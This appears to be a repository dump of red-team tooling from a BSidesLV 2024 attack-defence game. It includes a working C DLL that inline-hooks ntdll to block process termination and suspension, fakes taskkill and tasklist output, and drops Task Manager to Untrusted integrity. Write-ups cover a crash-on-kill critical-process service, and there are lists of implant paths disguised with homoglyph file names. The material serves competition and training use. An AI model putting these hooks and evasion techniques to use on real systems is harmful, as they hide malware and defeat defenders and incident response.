int IsHookTerminate(int sn, WCHAR s[MAX_PATH]) {
    if (IsUntrust(sn, s)) {
        return TRUE;
    }
    for (int i = 0; i < SIZE_C; i++) {
        if (IsProcName(sn, s, strlen(targetsC[i]), targetsC[i])) {
            return TRUE;
        }
    }
    return FALSE;
}
// IsProcName: case-insensitive check that the wide string src (srcLen chars)
// ends with the narrow string find (findLen chars), comparing from the end.
// NOTE(review): tolower() on a WCHAR value above 0xFF is undefined in C; this
// is fine for ASCII paths only.
int IsProcName(int srcLen, WCHAR *src, int findLen, const char *find) {
    if (findLen > srcLen) {
        return FALSE;
    }
    for (int i = 1; findLen - i >= 0 && srcLen - i >= 0; i++) {
        if (tolower(find[findLen - i]) == tolower(src[srcLen - i])) {
            continue;
        }
        return FALSE;
    }
    return TRUE;
}

// Find scans memory from `module` forward, 1 KiB at a time and up to 64 KiB
// past `func`, for a run of at least size + 1 consecutive padding bytes
// (0x90 nop or 0xCC int3). Returns the address where a `size`-byte cave
// starts, or 0 when ReadProcessMemory fails or nothing is found.
// The run counter `c` is not reset between reads, so a run may straddle two
// 1 KiB blocks.
ptr Find(int size, ptr module, ptr func) {
    SIZE_T n;
    int c = 0;
    unsigned char b[1024];
    for (ptr x = module; x < func + 65535; x += 1024) {
        if (ReadProcessMemory(GetCurrentProcess(), (LPVOID)x, b, 1024, &n) == 0) {
            return 0;
        }
        for (int i = 0; i < n; i++) {
            if (b[i] == 0x90 || b[i] == 0xCC) {
                if (c >= size + 1) {
                    return x + i - size;
                }
                c++;
                continue;
            }
            c = 0;
        }
    }
    return 0;
}

// Redo re-applies the 5-byte jmp to the hooked export and releases the hook's
// mutex taken by Undo. Result of the write is ignored.
void Redo(hook *h) {
    SIZE_T n;
    WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n);
    ReleaseMutex(h->mutex);
}
// Undo takes the hook's mutex and restores the export's original bytes so the
// real function can be called; Redo must follow to release the mutex.
// No-op for a hook that was never installed.
void Undo(hook *h) {
    if (h->mutex == NULL || h->target == 0) {
        return;
    }
    WaitForSingleObject(h->mutex, INFINITE);
    SIZE_T n;
    WriteProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n);
}
// Hook installs an inline hook on `func` (an export of `mod`) redirecting to
// `replacement`:
//   1. Find a padding cave of SIZE_PATCH bytes near func.
//   2. Save func's first SIZE_JUMP bytes into h->orig; bail if they already
//      start with E9 (already hooked).
//   3. Patch the replacement address into `jump` and write it into the cave.
//   4. Write an E9 rel32 at func whose target is cave + 1 (the byte after the
//      leading nop): rel32 = (b + 1) - (func + 5) = (b - 4) - func.
//   5. Create the per-hook mutex used by Undo/Redo.
// On any failure h->target is left 0 or h->mutex NULL, which Undo treats as
// "not installed".
//
// NOTE(review): both VirtualProtect results are unchecked and the original
// protection is never restored, leaving the pages RWX.
void Hook(hook *h, HANDLE mod, FARPROC func, ptr replacement) {
    if (mod == NULL || func == NULL || replacement == 0) {
        return;
    }
    ptr b = Find(SIZE_PATCH, (ptr)mod, (ptr)func);
    if (b == 0) {
        return;
    }
    SIZE_T n;
    h->target = (LPVOID)func;
    DWORD p;
    VirtualProtect(h->target, SIZE_JUMP, PAGE_EXECUTE_READWRITE, &p);
    if (ReadProcessMemory(GetCurrentProcess(), h->target, h->orig, SIZE_JUMP, &n) == 0 || n != SIZE_JUMP) {
        h->target = 0;
        return;
    }
    if (h->orig[0] == 0xE9) {
        h->target = 0;
        return;
    }
    WaitForSingleObject(mutexGlobal, INFINITE);
    // imm64 of the movabs, little-endian, bytes 3..10 of `jump`.
    jump[10] = (replacement >> 56) & 0xFF;
    jump[9] = (replacement >> 48) & 0xFF;
    jump[8] = (replacement >> 40) & 0xFF;
    jump[7] = (replacement >> 32) & 0xFF;
    jump[6] = (replacement >> 24) & 0xFF;
    jump[5] = (replacement >> 16) & 0xFF;
    jump[4] = (replacement >> 8) & 0xFF;
    jump[3] = replacement & 0xFF;
    VirtualProtect((LPVOID)b, SIZE_PATCH, PAGE_EXECUTE_READWRITE, &p);
    if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)b, jump, SIZE_PATCH, &n) == 0 || n != SIZE_PATCH) {
        ReleaseMutex(mutexGlobal);
        return;
    }
    ptr d = (b - 4) - (ptr)func;
    h->patch[4] = (d >> 24) & 0xFF;
    h->patch[3] = (d >> 16) & 0xFF;
    h->patch[2] = (d >> 8) & 0xFF;
    h->patch[1] = d & 0xFF;
    h->patch[0] = 0xE9;
    DWORD r = WriteProcessMemory(GetCurrentProcess(), h->target, h->patch, SIZE_JUMP, &n);
    ReleaseMutex(mutexGlobal);
    if (r == 0 || n != SIZE_JUMP) {
        return;
    }
    h->mutex = CreateMutex(NULL, FALSE, NULL);
}

// DllMain: on DLL_PROCESS_ATTACH, classify the host by its image path and act:
//   - targetsB match        -> return FALSE (load fails, DLL is not kept).
//   - taskkill.exe          -> print "SUCCESS" and exit 0 (nothing is killed).
//   - tasklist.exe          -> print a fake process table and exit 0.
//   - notepad.exe           -> no hooks.
//   - untrusted (IsUntrust) -> start DoUntrust on a thread.
// Then hook NtSuspendProcess, and for IsHookTerminate hosts also
// NtSuspendThread and NtTerminateProcess.
//
// NOTE(review): LoadLibraryW and CreateThread are called under the loader lock
// inside DllMain, which the DLL-entry documentation advises against; the
// "\0" suffixes inside the printf literals are redundant with the implicit
// terminator.
EXPORT BOOL WINAPI DllMain(HINSTANCE h, DWORD r, LPVOID args) {
    if (r != DLL_PROCESS_ATTACH) {
        return TRUE;
    }
    DisableThreadLibraryCalls(h);
    WCHAR s[MAX_PATH];
    DWORD n = GetModuleFileNameW(NULL, (LPWSTR)s, MAX_PATH);
    if (n == 0) {
        return TRUE;
    }
    if (IsExclude(n, s)) {
        return FALSE;
    }
    if (IsProcName(n, s, 12, "taskkill.exe\0")) {
        printf("SUCCESS\n\0");
        ExitProcess(0);
        return TRUE;
    }
    if (IsProcName(n, s, 12, "tasklist.exe\0")) {
        printf("Image Name PID Session Name Session# Mem Usage\n\0");
        printf("========================= ======== ================ =========== ============\n\0");
        printf("System Idle Process 0 Services 0 0 K\n\0");
        printf("System 4 Services 0 0 K\n\0");
        printf("smss.exe 0 Services 0 0 K\n\0");
        printf("csrss.exe 0 Console 0 0 K\n\0");
        printf("duck.exe -1 Services 1 0 K\n\0");
        printf("wininit.exe 0 Services 0 0 K\n\0");
        printf("never_gonna 10 Console 1 0 K\n\0");
        printf("give_you_up 11 Console 1 0 K\n\0");
        printf("never_gonna 12 Console 1 0 K\n\0");
        printf("let_you_down 13 Console 1 0 K\n\0");
        printf("never_gonna 14 Console 1 0 K\n\0");
        printf("run_around 15 Console 1 0 K\n\0");
        printf("and_hurt_you 16 Console 1 0 K\n\0");
        printf("never_gonna 17 Console 1 0 K\n\0");
        printf("say_goodbye 18 Console 1 0 K\n\0");
        printf("never_gonna 19 Console 1 0 K\n\0");
        printf("see_you_cry 20 Console 1 0 K\n\0");
        ExitProcess(0);
        return TRUE;
    }
    if (IsProcName(n, s, 11, "notepad.exe\0")) {
        return TRUE;
    }
    if (IsUntrust(n, s)) {
        CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)DoUntrust, NULL, 0, NULL);
    }
    HANDLE a = LoadLibraryW(L"ntdll.dll");
    Hook(&NtSuspendProcessHook, a, GetProcAddress(a, "NtSuspendProcess"), (ptr)&NtSuspendProcessFunc);
    if (IsHookTerminate(n, s)) {
        Hook(&NtSuspendThreadHook, a, GetProcAddress(a, "NtSuspendThread"), (ptr)&NtSuspendThreadFunc);
        NtTerminateProcess = (funcNtTerminateProcess)GetProcAddress(a, "NtTerminateProcess");
        Hook(&NtTerminateProcessHook, a, (FARPROC)NtTerminateProcess, (ptr)&NtTerminateProcessFunc);
    }
    return TRUE;
}

// Replacement for NtSuspendProcess: reports success (0) without suspending.
NTSTATUS NTAPI NtSuspendProcessFunc(HANDLE h) {
    return 0;
}
// Replacement for NtSuspendThread: reports success (0) without suspending.
NTSTATUS NTAPI NtSuspendThreadFunc(HANDLE h, PULONG x) {
    return 0;
}
// Replacement for NtTerminateProcess: any handle that does not refer to the
// current process gets a non-zero (failure) status back; for the process
// itself the hook is lifted (Undo), the real call is made and the hook is
// re-applied (Redo).
// NOTE(review): the NULL-handle form of NtTerminateProcess (terminate self)
// does not match GetCurrentProcessId here and is refused — confirm intent.
NTSTATUS NTAPI NtTerminateProcessFunc(HANDLE h, NTSTATUS x) {
    if (GetProcessId(h) != GetCurrentProcessId()) {
        return 1;
    }
    Undo(&NtTerminateProcessHook);
    NTSTATUS r = NtTerminateProcess(h, x);
    Redo(&NtTerminateProcessHook);
    return r;
}
-------------------------------------------------------------------------------- /BSidesLV-2024/Support/malware.ico: -------------------------------------------------------------------------------- 1 | version https://git-lfs.github.com/spec/v1 2 | oid sha256:759bd3fe1b90b4875cfd8d6639c5d89ba9a3c76417afe5184d865bff6d67fea7 3 | size 16958 4 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/malware.rc:
-------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 15 | // 16 | 17 | #include 18 | 19 | IDI_ICON_128 ICON "malware.ico" 20 | VS_VERSION_INFO VERSIONINFO 21 | FILEVERSION 4,5,6,69 22 | PRODUCTVERSION 4,5,6,69 23 | FILEFLAGSMASK VS_FFI_FILEFLAGSMASK 24 | FILEFLAGS 0 25 | FILEOS VOS__WINDOWS32 26 | FILETYPE VFT_DLL 27 | FILESUBTYPE VFT2_UNKNOWN 28 | 29 | BEGIN 30 | BLOCK "StringFileInfo" 31 | BEGIN 32 | BLOCK "040904B0" 33 | BEGIN 34 | VALUE "Comments", "Don't worry, I'm harmless!" 
35 | VALUE "CompanyName", "US National Security Agency" 36 | VALUE "FileDescription", "Not Malware" 37 | VALUE "FileVersion", "0.0.0.0" 38 | VALUE "InternalName", "malware" 39 | VALUE "LegalCopyright", "Copyright(C) 2011 NSA" 40 | VALUE "OriginalFilename", "malware_build1.exe" 41 | VALUE "ProductName", "Not Malware" 42 | VALUE "ProductVersion", "0.0.0.0" 43 | END 44 | END 45 | BLOCK "VarFileInfo" 46 | BEGIN 47 | VALUE "Translation", 0x409, 1200 48 | END 49 | END 50 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/manifest.rc: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2023 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
15 | // 16 | 17 | #include "winuser.h" 18 | 1 RT_MANIFEST manifest.xml 19 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/manifest.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | 12 | 13 | -------------------------------------------------------------------------------- /BSidesLV-2024/Support/nop.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see . 
//

// nop.c - minimal decoy executable (linked as malware.exe and bitcoin.exe by
// build.sh): it only sleeps forever so the process stays visible in a process
// list without doing anything.

#define WINVER 0x0501
#define _WIN32_WINNT 0x0501

// Strip windows.h down to what this file uses.
#define NOWH
#define NOMB
#define NOMSG
#define NONLS
#define NOMCX
#define NOIME
#define NOHELP
#define NOCOMM
#define NOICONS
#define NOCRYPT
#define NOKANJI
#define NOSOUND
#define NOCOLOR
#define NOMENUS
#define NOCTLMGR
#define NOMINMAX
#define NOSCROLL
#define NODRAWTEXT
#define NOMETAFILE
#define NOPROFILER
#define NOKEYSTATES
#define NORASTEROPS
#define NOCLIPBOARD
#define NOWINSTYLES
#define NOSYSMETRICS
#define NOWINOFFSETS
#define NOSHOWWINDOW
#define NOTEXTMETRIC
#define NOSYSCOMMANDS
#define NOGDICAPMASKS
#define NOWINMESSAGES
#define NODEFERWINDOWPOS
#define NOVIRTUALKEYCODES
#define WIN32_LEAN_AND_MEAN

// NOTE(review): the header name was lost in this rendering of the file.
#include

// Entry point: an alertable infinite sleep; the process only ends when it is
// terminated externally. No return statement — the function falls off its end.
int main(int argc, char *argv[]) {
    SleepEx(INFINITE, TRUE);
}
-------------------------------------------------------------------------------- /BSidesLV-2024/Support/nop_svc.c: -------------------------------------------------------------------------------- 1 | // Copyright (C) 2020 - 2024 iDigitalFlame 2 | // 3 | // This program is free software: you can redistribute it and/or modify 4 | // it under the terms of the GNU General Public License as published by 5 | // the Free Software Foundation, either version 3 of the License, or 6 | // any later version. 7 | // 8 | // This program is distributed in the hope that it will be useful, 9 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 10 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the 11 | // GNU General Public License for more details. 12 | // 13 | // You should have received a copy of the GNU General Public License 14 | // along with this program. If not, see .
//

// nop_svc.c - minimal decoy Windows service (linked as dolphin.exe by
// build.sh). Unlike duck.c it accepts both STOP and SHUTDOWN controls and
// does nothing but wait for one of them.

#define WINVER 0x0501
#define _WIN32_WINNT 0x0501

// Strip windows.h down to what this file uses.
#define NOWH
#define NOMB
#define NOMSG
#define NONLS
#define NOMCX
#define NOIME
#define NOHELP
#define NOCOMM
#define NOICONS
#define NOCRYPT
#define NOKANJI
#define NOSOUND
#define NOCOLOR
#define NOMENUS
#define NOCTLMGR
#define NOMINMAX
#define NOSCROLL
#define NODRAWTEXT
#define NOMETAFILE
#define NOPROFILER
#define NOKEYSTATES
#define NORASTEROPS
#define NOCLIPBOARD
#define NOWINSTYLES
#define NOSYSMETRICS
#define NOWINOFFSETS
#define NOSHOWWINDOW
#define NOTEXTMETRIC
#define NOSYSCOMMANDS
#define NOGDICAPMASKS
#define NOWINMESSAGES
#define NODEFERWINDOWPOS
#define NOVIRTUALKEYCODES
#define WIN32_LEAN_AND_MEAN

// NOTE(review): the header name was lost in this rendering of the file.
#include

// state: manual-reset event signalled by the control handler on stop/shutdown.
// run: status handle returned by RegisterServiceCtrlHandlerExW.
HANDLE state;
SERVICE_STATUS_HANDLE run;

void WINAPI UpdateState(DWORD);
void WINAPI NopService(DWORD, LPWSTR *);

// Entry point: hands the process to the SCM dispatcher with NopService as the
// only service entry (empty name).
int main(int argc, char *argv[]) {
    SERVICE_TABLE_ENTRYW t[] = {{L"", &NopService}, {NULL, NULL}};
    StartServiceCtrlDispatcherW(t);
    return 0;
}

// ServiceManager is the HandlerEx callback: STOP and SHUTDOWN both report
// SERVICE_STOP_PENDING (0x3) and signal `state`; any other control code just
// re-reports SERVICE_RUNNING (0x4). v, d and x are unused.
DWORD WINAPI ServiceManager(DWORD c, DWORD v, void *d, void *x) {
    switch (c) {
    case SERVICE_CONTROL_STOP:
    case SERVICE_CONTROL_SHUTDOWN:
        UpdateState(0x3);
        SetEvent(state);
        break;
    default:
        UpdateState(0x4);
        break;
    }
    return 0;
}

// UpdateState reports state s to the SCM: service type 0x10
// (SERVICE_WIN32_OWN_PROCESS), controls accepted 0x5
// (SERVICE_ACCEPT_STOP | SERVICE_ACCEPT_SHUTDOWN), remaining fields 0.
void WINAPI UpdateState(DWORD s) {
    SERVICE_STATUS v = {0x10, s, 0x5, 0, 0, 0, 0};
    SetServiceStatus(run, &v);
}
// NopService is the ServiceMain: register the handler, report START_PENDING
// (0x2) then RUNNING (0x4), block on `state` until a stop/shutdown control
// arrives, then report STOP_PENDING (0x3) and STOPPED (0x1).
// NOTE(review): the RegisterServiceCtrlHandlerExW result is not checked.
void WINAPI NopService(DWORD argc, LPWSTR *argv) {
    run = RegisterServiceCtrlHandlerExW(L"", &ServiceManager, NULL);
    UpdateState(0x2);
    state = CreateEventW(NULL, TRUE, FALSE, NULL);
    UpdateState(0x4);
    WaitForSingleObject(state, INFINITE);
    UpdateState(0x3);
    CloseHandle(state);
    UpdateState(0x1);
}
-------------------------------------------------------------------------------- /BSidesLV-2024/duck.md: -------------------------------------------------------------------------------- 1 | # The Duck Service 2 | 3 | The Duck service was a fun one this year. 4 | 5 | When started, it registered itself as a Critical Process, which would crash Windows 6 | if it died. 7 | 8 | The service was written to prevent being stopped and only respond to shutdown requests. 9 | 10 | Source in [`Support/duck.c`](Support/duck.c) 11 | 12 | ## Startup 13 | 14 | Get `SeDebugPrivilege` (required for the registration) 15 | 16 | ```C 17 | // Enable SeDebugPrivilege on the supplied Token. The DWORD arg can be used to 18 | // disable or enable the privilege. 19 | BOOL DuckDebug(HANDLE t, DWORD s) { 20 | if (fNtAdjustTokenPrivileges == NULL) { 21 | return FALSE; 22 | } 23 | TOKEN_PRIVILEGES p; 24 | p.PrivilegeCount = 1; 25 | p.Privileges[0].Attributes = s; 26 | p.Privileges[0].Luid.HighPart = 0; 27 | p.Privileges[0].Luid.LowPart = 0x14; // SE_DEBUG_PRIVILEGE 28 | DWORD u = 0; 29 | NTSTATUS r = fNtAdjustTokenPrivileges(t, FALSE, &p, 0x7C, NULL, &u); 30 | CloseHandle(t); 31 | if (r == 0) { 32 | return TRUE; 33 | } 34 | return FALSE; 35 | } 36 | ``` 37 | 38 | Set `ProcessBreakOnTermination` 39 | 40 | ```C 41 | // 0x2 - SE_PRIVILEGE_ENABLED 42 | if (DuckDebug(t, 0x2)) { 43 | // Only run if the privilege was got. 44 | // 0x1D - ProcessBreakOnTermination 45 | DWORD r = 0; 46 | // See if we have the flag already, if we can't get it, break. 47 | if (fNtQuery(GetCurrentProcess(), 0x1D, &last, 0x4, &r) > 0) { 48 | return; 49 | } 50 | DWORD v = 1; 51 | // 'v' value of 'ProcessBreakOnTermination' to be set. 1 == enabled. 52 | // 0x4 is the buffer size (its a DWORD, so 4 bytes). 53 | fNtSetInformationProcess(GetCurrentProcess(), 0x1D, &v, 0x4); 54 | // Release the privilege. 
55 | // 0x0 - SE_PRIVILEGE_DISABLED 56 | DuckDebug(t, 0); 57 | } 58 | ``` 59 | 60 | Tell SCM that we'll only respond to shutdown requests. 61 | 62 | ```C 63 | VOID WINAPI DuckStatus(DWORD s) { 64 | // Only set that we reply to SERVICE_CONTROL_SHUTDOWN 65 | SERVICE_STATUS v = {0x10, s, 0x4, 0, 0, 0, 0}; 66 | SetServiceStatus(duck, &v); 67 | } 68 | ``` 69 | 70 | Boom! 71 | -------------------------------------------------------------------------------- /BSidesLV-2024/files.md: -------------------------------------------------------------------------------- 1 | # Database Lists 2 | 3 | These files will called by the implants to load more implants. 4 | Each file was encrypted, but you may have noticed this being loaded as an IOC. 5 | 6 | ```text 7 | C:\Windows\vpnplugins\f5\Common\StandаrdStylex.xbf 8 | C:\Windows\Microsoft.NET\assembly\GAC_64\napcrypt\v4.0_6.3.0.0__31bf3856ad364e35\nаpcrypt.dll 9 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Channels\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Cһannels.dll 10 | C:\Program Files (x86)\Windows NT\TableTextService\en-US\TableTextЅervice.mui 11 | C:\Windows\apppatch\apppatch64\AcԜinRT.sdb 12 | C:\Windows\System32\fi-FI\msimig.mui 13 | C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Security.ApplicationId.PolicyManagement.PolicyEngineApi.Interop\v4.0_6.3.0.0__31bf3856ad364e35\mdmcommu.dll 14 | C:\Windows\SysWOW64\drivers\en-US\wfplwvs.mui 15 | C:\Windows\Boot\EFI\ru-RU\memtesp.mui 16 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Deployment\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Deploymеnt.dll 17 | C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data.OracleClient\v4.0_4.0.0.0__b77a5c561934e089\System.Data.OracleClienc.dll 18 | C:\Windows\System32\shwebnvc.com 19 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_pt-BR_31bf3856ad364e35\Microsoft.IdentityServer.Web.Resourcеs.dll 20 | 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility.Resources\v4.0_3.0.0.0_en_31bf3856ad364e35\UserProfileConfigurationWmiProvider.dll 21 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Controls.Ribbon\v4.0_4.0.0.0__b77a5c561934e089\NBMapTIP.dll 22 | C:\Windows\SysWOW64\InstallShield\setupdir\0010\isoburn.dll 23 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internalg.dll 24 | C:\Program Files\Windows Media Player\Media Renderer\RenderingControӏ.png 25 | C:\Windows\SystemResources\Windows.UI.MediaViewer\WindowsInternal_Inbox_Media_Viewer\Camera\ksetup.xbf 26 | C:\Windows\Web\Wallpaper\Theme1\ïmg4.jpg 27 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Tpm\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.dll 28 | C:\Windows\Microsoft.NET\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\normnfad.dll 29 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_pt_31bf3856ad364e35\Microsoft.IdentityServer.Web.Resourceb.dll 30 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\WsatConfig\v4.0_4.0.0.0__b03f5f7f11d50a3a\TileSmall.contrast-white.exe 31 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.SDCommon\v4.0_6.3.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDConmon.dll 32 | C:\Program Files (x86)\Windows Defender\EppManifemt.dll 33 | C:\Windows\SysWOW64\oobe\cmisеtup.dll 34 | C:\Windows\System32\wdi\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{a9320207-0fcd-42e1-a71b-231481fb09a9}\vnapshօt.etl 35 | C:\Windows\SysWOW64\IME\SHARED\res\padrs416.dll 36 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Workflow.ServiceCore.Resources\v4.0_3.0.0.0_en_31bf3856ad364e35\Logo70.scale-180.dll 37 | C:\Windows\SysWOW64\IME\IMETC\Applets\imtcsкf.dll 38 | C:\Windows\SysWOW64\Licenses\neutral\Volume\Professional\winbrand.rtf 39 | 
C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_sl_31bf3856ad364e35\Microsoft.IdentityServer.Web.Rеsoubces.dll 40 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Net.NetworkInformation\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Net.NetworkInformatiok.dll 41 | C:\Windows\diagnostics\system\HomeGroup\en-US\DiagPackаge.mui 42 | C:\Windows\Boot\PCAT\pt-BR\bootmge.mui 43 | C:\Windows\SysWOW64\InstallShield\setupdir\001d\_setυp.dll 44 | C:\Windows\System32\ras\OptionalFeatures.scp 45 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.IdentityServer.Web.Resources\v4.0_6.3.0.0_el_31bf3856ad364e35\RjvMDMConfig.dll 46 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Caching\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Runtime.Cacһing.dll 47 | ``` 48 | -------------------------------------------------------------------------------- /BSidesLV-2024/hook.md: -------------------------------------------------------------------------------- 1 | # Userland Hooking 2 | 3 | Userland Hooking was done by injecting the compiled version of [`Support/hook.c`](Support/hook.c) 4 | into each user process. 5 | 6 | ## taskkill 7 | 8 | Taskkill was intercepted and made to return "SUCCESS" and exit with exit code 9 | zero. 10 | 11 | You'd notice this if you ran `tasklist /?`, it should return "SUCCESS", which is 12 | not valid behavior. 13 | 14 | ## tasklist 15 | 16 | Tasklist was intercepted and made to return a string constant. The returned results 17 | were not real processes. 
18 | 19 | The string value in question: 20 | 21 | ```text 22 | Image Name PID Session Name Session# Mem Usage 23 | ========================= ======== ================ =========== ============ 24 | System Idle Process 0 Services 0 0 K 25 | System 4 Services 0 0 K 26 | smss.exe 0 Services 0 0 K 27 | csrss.exe 0 Console 0 0 K 28 | duck.exe -1 Services 1 0 K 29 | wininit.exe 0 Services 0 0 K 30 | never_gonna 10 Console 1 0 K 31 | give_you_up 11 Console 1 0 K 32 | never_gonna 12 Console 1 0 K 33 | let_you_down 13 Console 1 0 K 34 | never_gonna 14 Console 1 0 K 35 | run_around 15 Console 1 0 K 36 | and_hurt_you 16 Console 1 0 K 37 | never_gonna 17 Console 1 0 K 38 | say_goodbye 18 Console 1 0 K 39 | never_gonna 19 Console 1 0 K 40 | see_you_cry 20 Console 1 0 K 41 | ``` 42 | 43 | ## taskmgr 44 | 45 | Task Manager was intercepted and a thread was started on runtime that removed 46 | all permissions and set the Token Integrity level to "Untrusted" making it unable 47 | to display or refresh process information. 48 | 49 | ```C 50 | DWORD DoUntrust(void) { 51 | Sleep(500); 52 | HANDLE t; 53 | // Get Token for the current process. 54 | // 0x200A8 - TOKEN_READ | TOKEN_ADJUST_PRIVILEGES | TOKEN_ADJUST_DEFAULT | TOKEN_QUERY 55 | if (!OpenProcessToken(GetCurrentProcess(), 0x200A8, &t)) { 56 | return 0; 57 | } 58 | SID a; 59 | DWORD c = 32; 60 | // Create an untrusted SID 61 | // 0x41 - WinUntrustedLabelSid 62 | if (!CreateWellKnownSid(0x41, NULL, &a, &c)) { 63 | CloseHandle(t); 64 | return 0; 65 | } 66 | SID_AND_ATTRIBUTES b; 67 | b.Sid = &a; 68 | b.Attributes = 0x20; // SE_GROUP_INTEGRITY 69 | // Set the untrusted SID as the Token Group SID 70 | // 0x19 - TokenIntegrityLevel 71 | SetTokenInformation(t, 0x19, &b, c + 4); 72 | CloseHandle(t); 73 | } 74 | ``` 75 | 76 | ## Process Hacker 77 | 78 | Similar to `taskmgr` this process had it permissions removed and it's Token 79 | Integrity level to "Untrusted" making it unable to display or refresh process 80 | information. 
81 | 82 | The one difference is an additional check against the `FileInfo\FileDescription` 83 | value, which would equal the same string regardless of the process name. This allows 84 | the process to be matched even if it is renamed. 85 | 86 | ## Other 87 | 88 | Other non-critical processes had the following API functions intercepted. 89 | 90 | - NtSuspendThread: Prevents suspending any thread. 91 | - NtSuspendProcess: Prevents suspending any process. 92 | - NtTerminateProcess: Prevents terminating any process. 93 | - This was bypassed when the target PID equals the current PID, as `ExitProcess` uses 94 | this under the hood. 95 | -------------------------------------------------------------------------------- /BSidesLV-2024/implants.md: -------------------------------------------------------------------------------- 1 | # List of Implants and Launchers 2 | 3 | These are the binaries that may have run during the game. Not every one was present 4 | on all machines, and placement is random. 5 | 6 | ## Implants 7 | 8 | These were implants potentially used during the game. These are ThunderStorm Bolts. 
9 | 10 | ```text 11 | C:\Windows\vpnplugins\juniper\JunosPulseVрn.exe 12 | C:\Windows\System32\iphlpaрi.exe 13 | C:\Windows\SysWOW64\en\AuthFWSnapIn.Resourceh.dll 14 | C:\Windows\System32\SystemResetPlatform\SysResetLayoui.exe 15 | C:\Windows\SysWOW64\wbem\ipsdeu.exe 16 | C:\Windows\System32\rfxvmh.exe 17 | C:\Windows\SysWOW64\Com\mtsadmiո.dll 18 | C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceModel.Secukity.dll 19 | C:\Program Files (x86)\Windows Multimedia Platform\desk.dll 20 | C:\Windows\System32\migwiz\sfcm.dll 21 | C:\Windows\System32\kbdazе.exe 22 | C:\Windows\WinStore\AppxManifekt.exe 23 | C:\Windows\System32\fhuxсommon.exe 24 | C:\Windows\SysWOW64\IME\SHARED\res\padrs482.dll 25 | C:\Windows\ImmersiveControlPanel\vmbuspiper.exe 26 | C:\Windows\SysWOW64\Dism\SmiProvidgr.exe 27 | C:\Windows\BitLockerDiscoveryVolumeContents\cs-CZ_BitLockerToGо.exe 28 | C:\Windows\System32\rsaenһ.exe 29 | C:\Windows\System32\wbem\SystemResetOsUpdatesAgent.exe 30 | C:\Windows\System32\napdsոap.exe 31 | C:\Windows\System32\TimeSýncTask.exe 32 | C:\Windows\System32\Sysprep\uոbcl.exe 33 | C:\Windows\ADFS\en\taskschd.dll 34 | C:\Windows\ADFS\fr\mswb70011.dll 35 | C:\Program Files\Internet 